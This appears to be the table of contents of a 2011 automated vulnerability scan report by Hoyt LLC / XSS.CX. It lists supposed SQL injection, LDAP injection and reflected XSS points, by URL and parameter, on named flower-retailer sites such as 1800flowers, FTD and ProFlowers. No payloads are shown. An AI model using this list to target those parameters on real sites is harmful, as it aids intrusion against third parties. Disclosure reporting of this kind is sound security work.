XSS, Open Redirection, Insecure Configuration, CWE-79, CAPEC-86, DORK, GHDB, 05092011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 07:41:14 CDT 2011.


1. SQL injection

1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]

1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]

1.7. http://www.ftd.com/350/favicon.ico [REST URL parameter 1]

1.8. http://www.ftd.com/350/favicon.ico [REST URL parameter 2]

1.9. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 1]

1.10. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 2]

1.11. http://www.ftd.com/350/v20110407/ftd.css [REST URL parameter 3]

1.12. http://www.ftd.com/351 [REST URL parameter 1]

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]

1.24. http://xcdn.xgraph.net/17572/ai/xg.gif [REST URL parameter 1]

2. LDAP injection

2.1. http://blooms.1800flowers.com/cm [ci parameter]

2.2. http://www.ftd.com/ [TLTSID cookie]

3. XPath injection

4. Cross-site scripting (reflected)

4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]

4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]

4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]

4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]

4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]

4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]

4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]

4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]

4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]

4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]

4.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF [REST URL parameter 9]

4.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7inhollmix_honeywvn09_PF [REST URL parameter 9]

4.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLBlilyofvly_bluesquare11_PC1489_PF [REST URL parameter 9]

4.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAReaster_pnk10_PF [REST URL parameter 9]

4.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT215_BRR10006_MDay_11_PF [REST URL parameter 9]

4.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONTR205_BRR10012_MDay_11_PF [REST URL parameter 9]

4.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ [REST URL parameter 9]

4.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

4.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ [REST URL parameter 9]

4.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_PF [REST URL parameter 9]

4.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ [REST URL parameter 9]

4.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF [REST URL parameter 9]

4.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_SQ [REST URL parameter 9]

4.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR30112_Mday12_MDY_11_BS_PF [REST URL parameter 9]

4.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/F08_311626_PF [REST URL parameter 9]

4.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FD08_149362_W_2_PF [REST URL parameter 9]

4.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ [REST URL parameter 9]

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]

4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]

4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]

4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]

4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]

4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]

4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]

4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]

4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]

4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]

4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]

4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]

4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]

4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]

4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.73. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_PF [REST URL parameter 9]

4.74. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

4.75. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inbaby_tcuppnk09_Vday__ASPM_CNTRL_PF [REST URL parameter 9]

4.76. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblpurpphal_blktin09_PF [REST URL parameter 9]

4.77. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF [REST URL parameter 9]

4.78. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l [REST URL parameter 9]

4.79. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF [REST URL parameter 9]

4.80. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblbromgardn09_PF [REST URL parameter 9]

4.81. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF [REST URL parameter 9]

4.82. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF [REST URL parameter 9]

4.83. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF [REST URL parameter 9]

4.84. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b [REST URL parameter 9]

4.85. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0049189b [REST URL parameter 9]

4.86. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054324b [REST URL parameter 9]

4.87. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b [REST URL parameter 9]

4.88. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0063828b [REST URL parameter 9]

4.89. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0065857b [REST URL parameter 9]

4.90. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

4.91. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073650b [REST URL parameter 9]

4.92. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0085988b [REST URL parameter 9]

4.93. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0087026b [REST URL parameter 9]

4.94. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0102761b [REST URL parameter 9]

4.95. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

4.96. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ [REST URL parameter 9]

4.97. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009D282_88198_W1_SQ [REST URL parameter 9]

4.98. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ [REST URL parameter 9]

4.99. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

4.100. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D946_103270_W1 [REST URL parameter 9]

4.101. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ [REST URL parameter 9]

4.102. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007H4854_70842_W1_SQ [REST URL parameter 9]

4.103. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ [REST URL parameter 9]

4.104. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ [REST URL parameter 9]

4.105. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009D183X_087921_W1 [REST URL parameter 9]

4.106. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF [REST URL parameter 9]

4.107. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF [REST URL parameter 9]

4.108. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF [REST URL parameter 9]

4.109. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF [REST URL parameter 9]

4.110. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF [REST URL parameter 9]

4.111. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inmoneytree_lotus09_PF [REST URL parameter 9]

4.112. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4insucculent_4inbamboopot10_PC1449_PF [REST URL parameter 9]

4.113. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4inyelkalanchoe_beefelt11_PC1859_PF [REST URL parameter 9]

4.114. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF [REST URL parameter 9]

4.115. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6indkpnkazalea_sqbsktgrn10_PF [REST URL parameter 9]

4.116. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingard_victin11_PC1601_2_PF [REST URL parameter 9]

4.117. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF [REST URL parameter 9]

4.118. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inhydblu_sqbsktgrn10_PF [REST URL parameter 9]

4.119. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inltpnkrosalea_victin10_PF [REST URL parameter 9]

4.120. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF [REST URL parameter 9]

4.121. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkanthur_sqwht09_l [REST URL parameter 9]

4.122. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkazaleatop_urn08bud_PF [REST URL parameter 9]

4.123. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF [REST URL parameter 9]

4.124. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpurpazalea_sqbsktgrn09_PF [REST URL parameter 9]

4.125. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

4.126. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF [REST URL parameter 9]

4.127. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l [REST URL parameter 9]

4.128. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF [REST URL parameter 9]

4.129. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l [REST URL parameter 9]

4.130. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ [REST URL parameter 9]

4.131. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTangeltree10_PF [REST URL parameter 9]

4.132. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF [REST URL parameter 9]

4.133. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTgdnabonsai2_PF [REST URL parameter 9]

4.134. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_l [REST URL parameter 9]

4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]

4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]

4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]

4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]

4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]

4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]

4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]

4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]

4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]

4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]

4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]

4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]

4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]

4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]

4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]

4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]

4.166. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

4.167. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/palepink_tn [REST URL parameter 9]

4.168. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn [REST URL parameter 9]

4.169. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn [REST URL parameter 9]

4.170. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]

4.171. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx [trackingpgroup parameter]

4.172. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/Order.aspx [trackingpgroup parameter]

4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

